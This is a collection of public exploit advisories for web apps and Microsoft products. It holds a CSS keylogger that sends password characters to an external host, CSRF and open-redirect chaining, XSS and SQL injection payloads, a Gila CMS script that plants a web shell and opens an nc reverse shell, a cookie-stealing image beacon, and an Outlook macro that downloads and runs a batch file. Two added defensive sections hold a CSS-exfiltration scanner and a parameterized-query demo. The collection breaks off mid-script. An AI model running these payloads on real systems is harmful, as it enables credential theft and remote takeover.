Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF Version: 1.6.1 Bugs: Open Redirect + CSRF = CSS KEYLOGGING Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-07-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login to Account 2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw) 3. Then you upload html file .(html file content is as below) ''' <html> <head> <title> Login </title> <style> input[type="password"][value*="q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/q');} input[type="password"][value*="w"]{ background-image: url('https://enflownwx6she.x.pipedream.net/w');} input[type="password"][value*="e"]{ background-image: url('https://enflownwx6she.x.pipedream.net/e');} input[type="password"][value*="r"]{ background-image: url('https://enflownwx6she.x.pipedream.net/r');} input[type="password"][value*="t"]{ background-image: url('https://enflownwx6she.x.pipedream.net/t');} input[type="password"][value*="y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/y');} input[type="password"][value*="u"]{ background-image: url('https://enflownwx6she.x.pipedream.net/u');} input[type="password"][value*="i"]{ background-image: url('https://enflownwx6she.x.pipedream.net/i');} input[type="password"][value*="o"]{ background-image: url('https://enflownwx6she.x.pipedream.net/o');} input[type="password"][value*="p"]{ background-image: url('https://enflownwx6she.x.pipedream.net/p');} input[type="password"][value*="a"]{ background-image: url('https://enflownwx6she.x.pipedream.net/a');} input[type="password"][value*="s"]{ background-image: url('https://enflownwx6she.x.pipedream.net/s');} input[type="password"][value*="d"]{ background-image: url('https://enflownwx6she.x.pipedream.net/d');} input[type="password"][value*="f"]{ background-image: 
url('https://enflownwx6she.x.pipedream.net/f');} input[type="password"][value*="g"]{ background-image: url('https://enflownwx6she.x.pipedream.net/g');} input[type="password"][value*="h"]{ background-image: url('https://enflownwx6she.x.pipedream.net/h');} input[type="password"][value*="j"]{ background-image: url('https://enflownwx6she.x.pipedream.net/j');} input[type="password"][value*="k"]{ background-image: url('https://enflownwx6she.x.pipedream.net/k');} input[type="password"][value*="l"]{ background-image: url('https://enflownwx6she.x.pipedream.net/l');} input[type="password"][value*="z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/z');} input[type="password"][value*="x"]{ background-image: url('https://enflownwx6she.x.pipedream.net/x');} input[type="password"][value*="c"]{ background-image: url('https://enflownwx6she.x.pipedream.net/c');} input[type="password"][value*="v"]{ background-image: url('https://enflownwx6she.x.pipedream.net/v');} input[type="password"][value*="b"]{ background-image: url('https://enflownwx6she.x.pipedream.net/b');} input[type="password"][value*="n"]{ background-image: url('https://enflownwx6she.x.pipedream.net/n');} input[type="password"][value*="m"]{ background-image: url('https://enflownwx6she.x.pipedream.net/m');} input[type="password"][value*="Q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Q');} input[type="password"][value*="W"]{ background-image: url('https://enflownwx6she.x.pipedream.net/W');} input[type="password"][value*="E"]{ background-image: url('https://enflownwx6she.x.pipedream.net/E');} input[type="password"][value*="R"]{ background-image: url('https://enflownwx6she.x.pipedream.net/R');} input[type="password"][value*="T"]{ background-image: url('https://enflownwx6she.x.pipedream.net/T');} input[type="password"][value*="Y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Y');} input[type="password"][value*="U"]{ background-image: 
url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{ background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{ background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{ background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{ background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{ background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{ background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{ background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{ background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{ background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{ background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{ background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{ background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{ background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{ background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{ background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{ background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{ background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{ background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{ background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{ background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{ background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{ background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{ background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{ background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{ background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{ background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{ background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{ background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{ background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{ background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
  evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''

4. Then go to the URL of the HTML file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy the URL.

5. Then log out of the account and go to the login page again (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)

POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login

6. If you write (https://ATTACKER.com) in the url parameter of the above request, you are redirected to attacker.com.

7. We write the URL of the HTML file into the url parameter: url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8. And create a CSRF PoC with csrf.poc.generator:

<html>
<title> This CSRF was found by miri </title>
<body>
<h1> CSRF POC </h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

9. If the victim clicks, he is redirected to the HTML file, and this page sends all keyboard activity of the victim to my server.

Poc video : https://youtu.be/m-x_rYXTP9E
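The keylogger page above works because each `input[type="password"][value*="X"]` rule is paired with a `background-image` pointing at an external host, and the `keyup` handler copies the live value into the `value` attribute so the selectors can see it. A defender reviewing CSS that a CMS lets users upload (or that a proxy sees loaded on a login page) can flag exactly that combination. The scanner below is an added example and is not part of the advisory; the stylesheet it scans is constructed with a placeholder host, and the regular expressions are a deliberately simple flat-stylesheet parser rather than a full CSS grammar.

```python
"""Flag CSS rules that turn a form field's value into a remote fetch.

Added example, not code from the advisory above. The heuristic: a selector
that tests an input's value attribute ([value*=..], [value^=..], [value$=..])
combined with a url() to a host that is not on an allowlist.
"""
import re
from urllib.parse import urlparse

# One rule = selector { declarations }; adequate for flat stylesheets like the PoC.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)""", re.I)
TYPE_RE = re.compile(r"""input\s*\[\s*type\s*=\s*['"]?(\w+)['"]?\s*\]""", re.I)
VALUE_RE = re.compile(r"""\[\s*value\s*[*^$]?=\s*['"]?([^'"\]]*)['"]?\s*\]""", re.I)


def find_exfil_rules(css, trusted_hosts=()):
    """Return one finding per rule whose selector is keyed on an input's value
    attribute and whose declarations load a resource from an untrusted host."""
    findings = []
    for m in RULE_RE.finditer(css):
        selector = " ".join(m.group(1).split())
        value = VALUE_RE.search(selector)
        if not value:
            continue                          # ordinary styling, not value-keyed
        typ = TYPE_RE.search(selector)
        field_type = typ.group(1).lower() if typ else "unknown"
        for url in URL_RE.findall(m.group(2)):
            host = urlparse(url).hostname or ""
            if not host or host in trusted_hosts:
                continue                      # relative URL or allowlisted asset host
            findings.append({
                "selector": selector,
                "field_type": field_type,
                "host": host,
                "char": value.group(1),
                "severity": "high" if field_type == "password" else "medium",
            })
    return findings


def leaked_alphabet(findings):
    """The set of characters the remote host could distinguish from the fetches."""
    return sorted({f["char"] for f in findings})


# Constructed sample: one benign background plus value-keyed rules that point
# at a placeholder host (not the advisory's endpoint).
SAMPLE_CSS = """
body { background-image: url('https://cdn.example.invalid/bg.png'); }
input[type="password"][value*="a"]{ background-image: url('https://exfil.example.invalid/a');}
input[type="password"][value*="b"]{ background-image: url('https://exfil.example.invalid/b');}
input[type="password"][value*="@"]{ background-image: url('https://exfil.example.invalid/%40');}
input[type="text"][value^="x"]{ background-image: url('https://exfil.example.invalid/x');}
"""

if __name__ == "__main__":
    for f in find_exfil_rules(SAMPLE_CSS):
        print(f["severity"], f["field_type"], repr(f["char"]), "->", f["host"])
```

Two mitigations follow directly from what the scanner keys on: a Content-Security-Policy whose `img-src` and `style-src` are limited to the site's own origin stops the fetches regardless of the selector trick, and the open redirect in the login form's `url` parameter (step 6 above) is what delivers the page in the first place, so validating that parameter against a same-origin allowlist removes the delivery path.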
-
Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Date: 30/07/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/car-rental-php-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

Release Notes:
Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.

## Stored XSS
-----------------------------------------------
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
-----------------------------------------------
POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS

## Steps to Reproduce:
1. As a [Guest User], select any [Pickup/Return Location], choose any [Time] & [Rental Age], then click on [Search for rent a car] and select any car
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept the terms & press [Booking]. XSS fires in the local user's browser.
8. When the ADMIN visits [Dashboard] in the Administration Panel on this path (https://website/index.php?controller=GzAdmin&action=dashboard), the XSS will fire and execute in his browser
9. When the ADMIN visits [Bookings] - [All Booking] to check [Pending Booking] on this path (https://website/index.php?controller=GzBooking&action=index), the XSS will fire and execute in his browser
-
Beauty Salon Management System v1.0 - SQLi
# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date of found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89

Vulnerability Description -
Beauty Salon Management System: V1.0, developed by Campcodes, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate login authentication with the SQL queries and bypass authentication. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.

Steps to Reproduce -
The following steps outline the exploitation of the SQL Injection vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL: http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
2. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication for the username parameter:
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In}
3. Execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 793 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- rvYF&password=test&login=Sign In
---
[15:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
-
Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05-07-2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/
# Version: Gila 1.10.9
# Tested on: Linux

```python
import requests
from termcolor import colored
from urllib.parse import urlparse

# Print ASCII art
ascii_art = """
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝
by Unknown_Exploit
"""
print(colored(ascii_art, "green"))

# Prompt user for target URL
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")

# Extract domain from target URL
parsed_url = urlparse(target_url)
domain = parsed_url.netloc
target_url_2 = f"http://{domain}/"

# Prompt user for login credentials
username = input("Enter the email: ")
password = input("Enter the password: ")

# Create a session and perform login
session = requests.Session()
login_payload = {
    'action': 'login',
    'username': username,
    'password': password
}
response = session.post(target_url, data=login_payload)
cookie = response.cookies.get_dict()
var1 = cookie['PHPSESSID']
var2 = cookie['GSESSIONID']

# Prompt user for local IP and port
lhost = input("Enter the local IP (LHOST): ")
lport = input("Enter the local port (LPORT): ")

# Construct the payload
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"

# Perform file upload using POST request
upload_url = f"{target_url_2}fm/upload"
upload_headers = {
    "Host": domain,
    "Content-Length": "424",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
    "Accept": "*/*",
    "Origin": target_url_2,
    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9",
    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
    "Connection": "close"
}
upload_data = f'''
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
Content-Type: application/x-php

<?php system($_GET["cmd"]);?>
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="path"

tmp
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="g_response"

content
------WebKitFormBoundarynKy5BIIJQcZC80i2--
'''
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)

if upload_response.status_code == 200:
    print("File uploaded successfully.")
    # Execute payload
    response = session.get(payload_url)
    print("Payload executed successfully.")
else:
    print("Error uploading the file:", upload_response.text)
```
-
Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Title: Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure, https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145

## Description:
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information. The user would have to click on a specially crafted URL to be compromised by the attacker. In this example, the attacker uses STRIDE Threat Modeling to spoof the victim into clicking on his website, and that is it. This will be hard to detect.

## Conclusion:
Please be careful with suspicious sites, and be careful about who is sending you a link to open!

## Status: HIGH Vulnerability

[+]Exploit:
- Exploit Server:
```js
## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =)
<script>
var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)
</script>
## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spent: 01:30:00
-
Lost and Found Information System v1.0 - SQL Injection
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592

```python
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")
```
-
Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 25 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://piwigo.org
#Version: 13.7.0
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user authorized to upload photos.
2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.
3– Click on the uploaded photo and the photo editing screen opens. The XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.

#Payload
<sCriPt>alert(1);</sCriPt>
-
Faculty Evaluation System v1.0 - SQL Injection
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022

SQLi #1
File: edit_evaluation
Line #4
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]

SQLi #2
File: view_faculty.php
Line #4
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]

Steps to Exploit:
1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap

sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
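The three SQL injection advisories above (Beauty Salon Management System, Lost and Found Information System, Faculty Evaluation System) share one root cause: user input is concatenated into the query text, in a quoted string context for the login forms and in an unquoted numeric context for `where id = ".$_GET['id']`. The following is an added example, not the products' PHP/MySQLi code: it rebuilds both patterns against an in-memory SQLite database with constructed rows, runs the advisories' own payloads against the string-built queries, and shows that parameter binding (plus an integer type check for the numeric case) leaves the same inputs inert.

```python
"""String-built SQL beside its parameterized form (added example; SQLite in
memory with constructed data, not the advisories' PHP/MySQLi code)."""
import sqlite3

# Boolean-based payload exactly as quoted in the Beauty Salon advisory
PAYLOAD_LOGIN_BYPASS = ("admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 "
                        "ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh")
# Classic bypass quoted in the Lost and Found advisory
PAYLOAD_OR_TRUE = "' OR 1=1 -- "


def setup_demo_db():
    """Constructed sample schema and rows; nothing here comes from the products."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery');
        CREATE TABLE faculty_list (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT);
        INSERT INTO faculty_list VALUES (1, 'Ada', 'Lovelace'), (2, 'Alan', 'Turing');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The login-form pattern: input pasted into a quoted string context."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Placeholders: the driver passes values out of band, so quotes and comment
    markers in the input are data, never syntax. (A real system would also
    compare a password hash, not the plaintext.)"""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def faculty_vulnerable(conn, id_param):
    """The view_faculty.php pattern: unquoted numeric context, no quote needed."""
    sql = ("SELECT id, firstname || ' ' || lastname AS name "
           f"FROM faculty_list WHERE id = {id_param}")
    return conn.execute(sql).fetchall()


def faculty_safe(conn, id_param):
    """Type check first, then bind. Returns None for anything that is not an integer."""
    try:
        fid = int(id_param)
    except (TypeError, ValueError):
        return None
    sql = ("SELECT id, firstname || ' ' || lastname AS name "
           "FROM faculty_list WHERE id = ?")
    return conn.execute(sql, (fid,)).fetchall()


if __name__ == "__main__":
    db = setup_demo_db()
    print("vulnerable login, wrong password:", login_vulnerable(db, PAYLOAD_LOGIN_BYPASS, "wrong"))
    print("safe login, wrong password:     ", login_safe(db, PAYLOAD_LOGIN_BYPASS, "wrong"))
    print("vulnerable id=1 OR 1=1:", faculty_vulnerable(db, "1 OR 1=1"))
    print("safe id=1 OR 1=1:      ", faculty_safe(db, "1 OR 1=1"))
```

The same two fixes apply in the original PHP: `$conn->prepare(...)` with `bind_param` for the login queries, and a cast (or `filter_var(..., FILTER_VALIDATE_INT)`) before binding for the `id` parameter. sqlmap's boolean-based and time-based findings in the Beauty Salon advisory are exactly the probes that stop producing different responses once the value is bound rather than concatenated.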
-
Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
## Author: nu11secur1ty
## Date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131

## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content to everyone who is using the Outlook app, no matter whether web or local. Microsoft still doesn't have a patch against this 0-day vulnerability today.

## Status: HIGH Vulnerability

[+]Exploit:
- The malicious Word file:
```js
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)

## Time spent: 00:30:00
-
Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Author: nu11secur1ty
## Date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
## CVE-2022-21907

## Description:
NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities; this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was ok, and everything is patched! Windows Server 2019 and Windows 10 version 1809 (2018) are not vulnerable by default, but after I decided to upgrade from 1909 to 2004, I found a serious problem! Windows 10 version 2004 (2020) is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow - denial of service and restart of the system. This problem has existed since last year, when it was reported as CVE-2021-31166, and it is still there! In those days I worked on it again with the help and collaboration of Axel Souchet (0vercl0k), the author of the idea. On that day, I wrote only a one-line command to exploit this vulnerability!

[+]Exploit:
```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907
from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host...\n")
print(Style.RESET_ALL)
print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)
print(Fore.BLUE +"Sending of especially malicious crafted packages, please wait...")
print(Style.RESET_ALL)
time.sleep(17)
print(Fore.GREEN)

# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
